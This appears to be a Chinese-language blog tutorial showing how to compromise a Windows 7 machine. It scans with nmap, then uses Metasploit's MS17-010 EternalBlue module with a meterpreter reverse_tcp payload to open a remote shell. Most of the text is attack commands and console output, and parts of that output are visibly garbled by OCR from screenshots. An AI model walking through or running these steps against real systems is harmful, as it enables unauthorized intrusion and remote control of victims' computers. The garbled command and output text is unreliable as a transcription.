利用metasploit渗透win7

1.使用nmap扫描PC漏洞 nmap -script vuln 目标IP地址

 

 

 

2.使用metasploit工具进行入侵

首先将postgresql启动

计算机生成了可选文字:
root@kali.、#ser\/icepostgresqlstart
root@kali.、#

然后运行msfconsole命令启动metasploit

search命令用于搜索 用它来搜索刚才扫出的漏洞

nsf > search ms17 
-010 
Matching Modules 
Name 
Disclosure Date 
2017-03-14 
2017-03-14 
2017-03-14 
2017-03-14 
auxiliary/ admin/ smb/ ms17 _ 010 _ command 
auxiliary/ scanner/ smb/ smb_ ms17_010 
exploit/windows/ smb/ ms17 _ 010 _ eternalblue 
exploit/windows/ smb/ msl 7 _ 010 _ eternalblue 
exploit/windows/ smb/ msl 7 _ 010 _ psexec 
win8 
Rank 
normal 
normal 
average 
average 
normal

使用第三个漏洞模块

msf > use exploit/windows/smb/ms17_010_eternalblue 
msf >

Show payloads查看可用载荷 这里使用红框内载荷

 

msf > set payload windows/x64/meterpreter/ reverse _ tcp 
payload windows/x64/meterpreter/ reverse _ tcp

Show options查看需要设置什么

msf 
> show options 
Module options : 
Name 
GroomAllocations 
GroomDelta 
MaxExploitAttempts 
RHOST 
SMBDomain 
SMBPass 
SMBUser 
VerifyArch 
VerifyTarget 
Current Setting Required Description 
12 
t rue 
t rue 
yes 
yes 
yes 
yes 
yes 
yes 
Initial number of times to groom the 
The amount to increase the groom coun 
The number of times to retry the expu 
Process to inject payload into. 
The target address 
The target port (TCP) 
(Optional) The Windows domain to use 
(Optional) The password for the speci 
(Optional) The username to authentica 
Check if remote architecture matches 
Check if remote OS matches exploit Ta 
Payload options (windows/x64/meterpreter/ reverse _ tcp) : 
Name 
EXITFUNC 
LHOST 
Current Setting Required Description 
th read 
yes 
Exit technique (Accepted: 
seh, thread, proc. 
The listen address (an interface may be specifi. 
The listen port 
Exploit target:

rhost为目标机IP地址 lhost为攻击机IP地址

msf > set rhost 192. 168. 150.3 
rhost 192.168. 150.3 
msf > set lhost 192. 168. 150.2 
Unost 192.168.150.2

设置完之后使用exploit命令进行渗透攻击 msf变成meterpreter表示入侵成功

msf 
Started 
> exploit 
reverse TCP handler on 192.168.150.2:4444 
192.168.150. 
3:44 5 
192.168.150 
. 3:44 5 
192.168.150 
. 3:44 5 
192.168.150 
. 3:44 5 
192.168.150 
. 3:44 5 
192.168.150 
. 3:44 5 
192.168.150 
. 3:44 5 
192.168. 150. 
3:44 5 
192.168.150 
. 3:44 5 
Connecting to target for exploitation. 
Connection established for exploitation. 
Target OS selected valid for OS indicated by SMB reply 
CORE raw buffer dump (25 bytes) 
oxoooooooo 
57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70 Windows 7 Enterp 
- ox00000010 
72 69 73 65 20 37 36 30 30 
rise 7600 
Target arch selected valid for arch indicated by DCE/RPC reply 
Trying exploit with 12 Groom Allocations. 
Sending all but last fragment of exploit packet 
Sending 
stage 
(206403 bytes) to 192.168.150.3 
Meter-preter session 1 opened (192.168.150.2:4444 192.168.150.3:49159) at 2018-07-26 +0800 
192.168.150.3:445 
RubySMB: : Error: : CommunicationError: RubySMB: : Error: : CommunicationError 
meter reter >

输入shell进入dos界面

计算机生成了可选文字:
meter-preter>she11
Process2旧6created.
Channel1created.
MicrosoftWindows[版本6.1.769的
版叔所有(c)299gMicrosoftCorporation
。保留所有叔利。

 

 

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注